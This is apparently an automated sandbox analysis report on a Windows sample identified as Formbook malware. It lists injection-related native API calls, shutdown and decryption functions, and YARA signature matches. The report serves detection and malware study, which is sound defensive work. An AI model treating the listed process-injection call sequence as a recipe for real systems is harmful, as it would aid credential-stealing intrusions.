Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00A49710
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A498A0 NtWriteVirtualMemory, 1_2_00A498A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49820 NtEnumerateKey, 1_2_00A49820
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4B040 NtSuspendThread, 1_2_00A4B040
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A499D0 NtCreateProcessEx, 1_2_00A499D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49950 NtQueueApcThread, 1_2_00A49950
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A80 NtOpenDirectoryObject, 1_2_00A49A80
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49A10 NtQuerySection, 1_2_00A49A10
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4A3B0 NtGetContextThread, 1_2_00A4A3B0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49B00 NtSetValueKey, 1_2_00A49B00
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A495F0 NtQueryInformationFile, 1_2_00A495F0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49520 NtWaitForSingleObject, 1_2_00A49520
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4AD30 NtSetContextThread, 1_2_00A4AD30
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49560 NtWriteFile, 1_2_00A49560
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A496D0 NtCreateKey, 1_2_00A496D0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49610 NtEnumerateValueKey, 1_2_00A49610
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49670 NtQueryInformationProcess, 1_2_00A49670
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49650 NtQueryValueKey, 1_2_00A49650
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49730 NtQueryVirtualMemory, 1_2_00A49730
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4A710 NtOpenProcessToken, 1_2_00A4A710
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49760 NtOpenProcess, 1_2_00A49760
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A49770 NtSetInformationFile, 1_2_00A49770
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A4A770 NtOpenThread, 1_2_00A4A770
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_004181B0 NtCreateFile, 1_1_004181B0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00418260 NtReadFile, 1_1_00418260
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_004182E0 NtClose, 1_1_004182E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00418390 NtAllocateVirtualMemory, 1_1_00418390
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041825A NtReadFile, 1_1_0041825A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_004182DA NtClose, 1_1_004182DA
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041838B NtAllocateVirtualMemory, 1_1_0041838B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649540 NtReadFile,LdrInitializeThunk, 6_2_04649540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046495D0 NtClose,LdrInitializeThunk, 6_2_046495D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649660 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_04649660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649650 NtQueryValueKey,LdrInitializeThunk, 6_2_04649650
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046496E0 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_046496E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046496D0 NtCreateKey,LdrInitializeThunk, 6_2_046496D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649710 NtQueryInformationToken,LdrInitializeThunk, 6_2_04649710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649FE0 NtCreateMutant,LdrInitializeThunk, 6_2_04649FE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649780 NtMapViewOfSection,LdrInitializeThunk, 6_2_04649780
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649860 NtQuerySystemInformation,LdrInitializeThunk, 6_2_04649860
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649840 NtDelayExecution,LdrInitializeThunk, 6_2_04649840
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_04649910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046499A0 NtCreateSection,LdrInitializeThunk, 6_2_046499A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A50 NtCreateFile,LdrInitializeThunk, 6_2_04649A50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649560 NtWriteFile, 6_2_04649560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649520 NtWaitForSingleObject, 6_2_04649520
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464AD30 NtSetContextThread, 6_2_0464AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046495F0 NtQueryInformationFile, 6_2_046495F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649670 NtQueryInformationProcess, 6_2_04649670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649610 NtEnumerateValueKey, 6_2_04649610
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649760 NtOpenProcess, 6_2_04649760
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464A770 NtOpenThread, 6_2_0464A770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649770 NtSetInformationFile, 6_2_04649770
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649730 NtQueryVirtualMemory, 6_2_04649730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464A710 NtOpenProcessToken, 6_2_0464A710
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046497A0 NtUnmapViewOfSection, 6_2_046497A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464B040 NtSuspendThread, 6_2_0464B040
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649820 NtEnumerateKey, 6_2_04649820
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046498F0 NtReadVirtualMemory, 6_2_046498F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046498A0 NtWriteVirtualMemory, 6_2_046498A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649950 NtQueueApcThread, 6_2_04649950
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046499D0 NtCreateProcessEx, 6_2_046499D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A20 NtResumeThread, 6_2_04649A20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A00 NtProtectVirtualMemory, 6_2_04649A00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A10 NtQuerySection, 6_2_04649A10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649A80 NtOpenDirectoryObject, 6_2_04649A80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04649B00 NtSetValueKey, 6_2_04649B00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0464A3B0 NtGetContextThread, 6_2_0464A3B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB82E0 NtClose, 6_2_02BB82E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB8260 NtReadFile, 6_2_02BB8260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB8390 NtAllocateVirtualMemory, 6_2_02BB8390
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB81B0 NtCreateFile, 6_2_02BB81B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB82DA NtClose, 6_2_02BB82DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB825A NtReadFile, 6_2_02BB825A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BB838B NtAllocateVirtualMemory, 6_2_02BB838B
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_0040314A EntryPoint,#17,OleInitialize,SHGetFileInfoA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,GetCommandLineA,GetModuleHandleA,CharNextA,OleUninitialize,ExitProcess,lstrcatA,CreateDirectoryA,lstrcatA,lstrcatA,DeleteFileA,GetModuleFileNameA,lstrcmpiA,CopyFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040314A
Detected potential crypto function
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 0_2_004046A7 0_2_004046A7
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B8B4 1_2_0041B8B4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C1CB 1_2_0041C1CB
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00401208 1_2_00401208
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C3FC 1_2_0041C3FC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041CB99 1_2_0041CB99
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00408C4B 1_2_00408C4B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00408C50 1_2_00408C50
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041C544 1_2_0041C544
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_0041B611 1_2_0041B611
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A320A0 1_2_00A320A0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD20A8 1_2_00AD20A8
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1B090 1_2_00A1B090
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD28EC 1_2_00AD28EC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ADE824 1_2_00ADE824
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC1002 1_2_00AC1002
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A24120 1_2_00A24120
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A0F900 1_2_00A0F900
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD22AE 1_2_00AD22AE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ABFA2B 1_2_00ABFA2B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3EBB0 1_2_00A3EBB0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AC03DA 1_2_00AC03DA
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACDBD2 1_2_00ACDBD2
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD2B28 1_2_00AD2B28
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1841F 1_2_00A1841F
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACD466 1_2_00ACD466
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A32581 1_2_00A32581
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1D5E0 1_2_00A1D5E0
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD25DD 1_2_00AD25DD
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A00D20 1_2_00A00D20
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD2D07 1_2_00AD2D07
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD1D55 1_2_00AD1D55
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD2EF7 1_2_00AD2EF7
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A26E30 1_2_00A26E30
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ACD616 1_2_00ACD616
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD1FF1 1_2_00AD1FF1
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00ADDFCE 1_2_00ADDFCE
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00401030 1_1_00401030
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B8B4 1_1_0041B8B4
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C1CB 1_1_0041C1CB
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00401208 1_1_00401208
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C3FC 1_1_0041C3FC
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041CB99 1_1_0041CB99
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00408C4B 1_1_00408C4B
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00408C50 1_1_00408C50
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041C544 1_1_0041C544
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00402D90 1_1_00402D90
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_0041B611 1_1_0041B611
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_1_00402FB0 1_1_00402FB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CD466 6_2_046CD466
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461841F 6_2_0461841F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D1D55 6_2_046D1D55
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04600D20 6_2_04600D20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D2D07 6_2_046D2D07
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461D5E0 6_2_0461D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D25DD 6_2_046D25DD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581 6_2_04632581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04626E30 6_2_04626E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CD616 6_2_046CD616
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D2EF7 6_2_046D2EF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D1FF1 6_2_046D1FF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046DDFCE 6_2_046DDFCE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046DE824 6_2_046DE824
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1002 6_2_046C1002
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D28EC 6_2_046D28EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D20A8 6_2_046D20A8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B090 6_2_0461B090
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460F900 6_2_0460F900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D22AE 6_2_046D22AE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D2B28 6_2_046D2B28
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C03DA 6_2_046C03DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CDBD2 6_2_046CDBD2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463EBB0 6_2_0463EBB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBCB99 6_2_02BBCB99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC3FC 6_2_02BBC3FC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC1AF 6_2_02BBC1AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC1CB 6_2_02BBC1CB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA2FB0 6_2_02BA2FB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA8C50 6_2_02BA8C50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA8C4B 6_2_02BA8C4B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BA2D90 6_2_02BA2D90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_02BBC544 6_2_02BBC544
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: String function: 00419F60 appears 38 times
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: String function: 00A0B150 appears 45 times
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: String function: 0041A090 appears 40 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 0460B150 appears 35 times
Sample file is different than original file name gathered from version info
Source: NdBLyH2h5d.exe, 00000000.00000003.211607404.000000001EF66000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
Source: NdBLyH2h5d.exe, 00000001.00000002.252496199.0000000000AFF000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs NdBLyH2h5d.exe
Source: NdBLyH2h5d.exe, 00000001.00000002.253177072.000000000264C000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameRUNDLL32.EXEj% vs NdBLyH2h5d.exe
Uses 32bit PE files
Source: NdBLyH2h5d.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.479447176.0000000002BA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.252981265.0000000000D10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.216382055.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.479518416.0000000002BD0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.477763536.00000000003B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.220737400.0000000002640000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.251780001.00000000009B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.250995157.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.NdBLyH2h5d.exe.2640000.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.NdBLyH2h5d.exe.2640000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.NdBLyH2h5d.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.NdBLyH2h5d.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/3@15/11
